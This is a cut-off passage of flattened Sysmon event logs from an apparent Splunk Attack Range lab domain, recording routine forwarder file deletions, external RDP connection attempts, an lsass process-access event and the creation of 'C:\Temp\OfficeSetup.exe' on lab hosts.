23542300x800000000000000062917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:14.520{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CCF33D52C9194224B8EC5210C9AC6E4,SHA256=B74EDC50B71DB11E2DC963231EEFCA68534FE9B51EFFB081A3BC6425D9CB88B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049226Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:14.157{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE08EA30062EFBD1531D3F60954DBEA,SHA256=371DAB1A8337CC45D3E3E7FF0CC9A3AF30BD6DCC8E7119F75F9458A759922EB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:14.488{A7A01FEF-DF97-607E-4709-00000000BB01}6584ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6584.xml~RFcdff88.TMPMD5=CDC37ABBACDC5A35D39581DFA1E69C56,SHA256=FD0C987C4EA499B0EF3F04D736EF983ED8B5570A1B8575164A63E0D9F0953E2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.816{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-B622-607E-0100-00000000BB01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000062918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.598{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA6D63A049C80EC3EF8FC2BB06945FD,SHA256=1F3C5EF78EB0A510F8BC161E12EA2B6C59FFB37A5E10005B3B78F0BE032F20E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049227Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:15.172{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96AF0EE52197240F5E01C142CBCB523C,SHA256=1A3689FF5B5E031A4811F8FDF4344B91622EC8A9C6DECBEBFF54D0F683741C66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.613{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B92ADA4E7730179A68B1EEEE9780E9C,SHA256=3F0A25F4E4768F5B97BB9B53ABF77521A67C13FBD1BD5E9E295F2BD9FF5ED91B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049231Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:14.703{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52468-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049230Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:14.295{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54938-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049229Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:16.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0AA1FF8EF8D610189698F7B4BBADE20,SHA256=63A9D0D69FB943CFBFF3C80C122476C84227039C3BBEC981ECB29E340A54C183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049228Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:16.204{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFC9C3E321C4E80EA66216302CDEBE48,SHA256=C7FCDA0112ACB148703EF0408B7FCA3CA46E58AF549AC4CFAFCDE61B82E51ECA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.363{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7188BD35051937D751E0752F56616902,SHA256=9628F72E969AE1427FD646634B58FF6D806E66E793C2B42D4A538B823331736B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:14.677{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-30910-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:14.636{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33643-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:17.738{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3EE763ED2F42577997869E0BFB9CBCF,SHA256=48BD9CE9B865BC2127FBAFA6AFD988ADAB9AC71CFD083813A1C7CAB8AC460640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:17.676{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2B543B1C21D52E1B17B4AF1E4EAA4A4,SHA256=781110FC65007CBDD90FC8E00828538F6C64980EE603A985449FACE000DEEBBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049234Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:15.909{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56421-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049233Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:15.699{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53460-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049232Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:17.219{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F7C0625251F1950B9319C32B403E5BB,SHA256=86C7FE3689F2D819DAEFB04AA2C097555178FB450ECBA2891A45D3FCA2475EF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.877{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57441-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000062930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.877{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57441-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local445microsoft-ds 354300x800000000000000062929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.774{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-339.attackrange.local57440-false10.0.1.14win-dc-339.attackrange.local389ldap 354300x800000000000000062928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.774{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57440-false10.0.1.14win-dc-339.attackrange.local389ldap 354300x800000000000000062927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.767{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57439-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000062926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.767{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57439-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local389ldap 354300x800000000000000062925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.634{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60397-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:15.295{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57438-false10.0.1.12-8000- 23542300x800000000000000062939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:18.691{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A6604B9B55E3199ABCDDAC674C7131,SHA256=ABFD3C578393F9558EF62F5C03C066204EDDB5CC8106E33D56AB9C0731AE68B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049236Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:18.297{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44962CC9333AE655409C3BA6B5B510D2,SHA256=06E6AEB7002BCE33C8F721ADA53A8F6F422C3014DA3DF9B83ABB1F7CEE2ADE27,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.257{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-26809-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.103{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32277-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.096{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-35009-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.096{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-339.attackrange.local138netbios-dgm 354300x800000000000000062934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:16.096{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-339.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x800000000000000049235Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:18.079{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18675413DDD968730FED3D7325894F7F,SHA256=AC141ED0E8DD7CA53E4C2CC5055EF2678EE188B5CA514E536067A5DE6CD276E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:19.707{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C0D0C9068908AA82FA56B4D604463D,SHA256=39532FDDFB04B30B149ABBE58AE1B52C1A37623A8DD97783DC2A58E7B500C5C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049239Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:17.841{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com57660-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049238Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:17.469{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57906-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049237Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:19.329{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFC88D1A1749832A1D55DDDF654DF2D1,SHA256=D6E9A64E816A6D61373F3B5A71D0F1B380BD42F0CC7891C4BFFDD62ECC7E18AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:17.808{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55769-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:17.615{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36375-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:20.754{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=589003B32158703C5DA95FF08E62F158,SHA256=DA57E455220B9B0716980F1B4B3892D8BE9EEB0B342F97129BAF1B1C751FBFC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:20.738{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=861C7B407590B173B9E0D9609C02808C,SHA256=C280CA6B197E7589FF2DE7A089BC3AED6065BEF858FA681193A2D3F1CFD4C3A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049241Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:20.454{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E3EC6E14D415566A6128F913346BB61,SHA256=47E6CCB223B9A42D072456FFF6B0E4245FD3F4FF55629CE04F428EC7453B7F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049240Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:20.344{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56448821B2AFA7DD81221A87216D0742,SHA256=22899EE8B89C6D648C6444AB9CDB058DA70A052CB3880E93AC59E3FBCCFCDE6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:21.847{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=747AF8A5A1F336913F6FC386BA85465A,SHA256=06E206A3D33AE7ED2402B3DC208606E01A64371BC3ADC4668BA528247A553AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:21.769{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7EC4EFAE9799B8F58F240B3CEB1CB17,SHA256=B1D88FCFE41A50A7CAEFDEC47F975A2BFF9D4AF613E9DA15A2A02BB906498ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049243Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:21.516{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F99A73121FA0D774EC5EDFEE0EFBB67B,SHA256=B4F384EDBFB8B43E7A5825BA8A4C28D6BBF53D41EC637D0D59C56EB794B7A0AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049242Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:21.360{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9774E84948A648E246D7B5141F7CFB36,SHA256=BC64A1201AF48B54D60A0C9B3140F5AF34ECCC6F3AC5FE7EC894C7F8E66DF7C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:19.693{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50958-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:22.863{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198B3527B1B6F94241C7034CFFA03FF4,SHA256=DD0313D0375A5F3F1000422015D272400CBA0F3B19DD1FAF01131A349ACF2EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049246Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:22.375{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F238AA89249103BD0D44D21DF6F509E,SHA256=609D8C65724E5495BCAF384C1B431010EA95DCB3889849D4524A866801C82AED,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:21.107{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57442-false10.0.1.12-8000- 354300x800000000000000062949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:20.670{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39107-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 11241100x800000000000000062948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:22.347{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXEC:\Temp\OfficeSetup.exe2021-04-20 14:53:22.347 354300x800000000000000049245Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:19.735{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52469-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049244Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:19.094{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59397-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:23.879{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EE1299654E0ED3B3C7A55B9168615D,SHA256=62581A860E4A5590A581885795933AF4A87420ED109B580F536E2C0A0647DA5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049248Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:23.657{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049247Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:23.391{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 